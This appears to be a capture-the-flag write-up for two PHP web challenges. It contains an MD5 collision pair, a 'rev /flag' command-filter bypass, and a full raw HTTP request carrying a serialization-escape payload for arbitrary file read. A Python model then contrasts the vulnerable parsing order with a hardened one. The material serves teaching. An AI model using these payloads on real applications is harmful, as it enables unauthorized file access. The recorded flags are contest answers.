1. easy_web

First, read index.php through the img parameter (the encoding is ASCII to hex, then base64 twice).
Next, use a genuine MD5 collision:
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
Then bypass the command-execution filter with rev /flag

flag: I-SOON{e505e63c6df04fa9a2b49ef349f8234a}

2. easy_serialize_php

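Character escaping combined with deserialization gives arbitrary file read.

Note that to get the flag file you first have to read phpinfo, find the flag field, and then read onward from there, one file after another.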

POST /index.php?f=show_image&img_path= HTTP/1.1
Host: 47.108.135.45:20004
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://47.108.135.45:20004/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh;q=0.9,zh-CN;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_SESSION[user]=phpphpphpphpphpphpphpphp&_SESSION[function]=1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"1";s:1:"1";}
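
An added example, not the challenge's source: a minimal Python model of PHP's serialize format showing why filtering the serialized string lets the `function` field from the request above replace `img`, next to the hardened order (filter the values, then serialize). The word list `php|flag` and the server-set default `guest.png` are assumptions.

```python
import re

# Assumed word list; the page does not show the challenge's filter.
FILTER = re.compile(r"php|flag", re.I)
STR = re.compile(r's:(\d+):"')

def php_serialize(d):
    """Model of PHP serialize() for a flat dict of ASCII strings."""
    body = "".join(f's:{len(k)}:"{k}";s:{len(v)}:"{v}";' for k, v in d.items())
    return "a:%d:{%s}" % (len(d), body)

def php_unserialize(s):
    """Model of unserialize(): trusts each length prefix, ignores trailing data."""
    head = re.match(r"a:(\d+):\{", s)
    if not head:
        raise ValueError("not a serialized array")
    pos, items = head.end(), []
    for _ in range(2 * int(head.group(1))):      # N keys + N values
        m = STR.match(s, pos)
        if not m:
            raise ValueError("expected string at offset %d" % pos)
        end = m.end() + int(m.group(1))          # skip exactly <len> characters
        if s[end:end + 2] != '";':
            raise ValueError("length prefix mismatch at offset %d" % pos)
        items.append(s[m.end():end])
        pos = end + 2
    if s[pos:pos + 1] != "}":
        raise ValueError("missing closing brace")
    return dict(zip(items[::2], items[1::2]))

def load_weak(session):
    # Filtering the serialized text shortens values but leaves s:<len> untouched.
    return php_unserialize(FILTER.sub("", php_serialize(session)))

def load_hardened(session):
    # Filter each value first, then serialize, so every prefix matches its value.
    clean = {k: FILTER.sub("", v) for k, v in session.items()}
    return php_unserialize(php_serialize(clean))

# The two POST fields from the request above; "guest.png" is an assumed default.
SESSION = {
    "user": "php" * 8,
    "function": '1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"1";s:1:"1";}',
    "img": "guest.png",
}

if __name__ == "__main__":
    print("weak:    ", load_weak(SESSION))
    print("hardened:", load_hardened(SESSION))
```

In the weak path the 24 removed characters make the `user` value swallow `";s:8:"function";s:58:"1`, so the rest of `function` is parsed as structure; in the hardened path it stays inert data and `img` keeps the server's value.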

Last modification: January 3rd, 2020 at 04:23 pm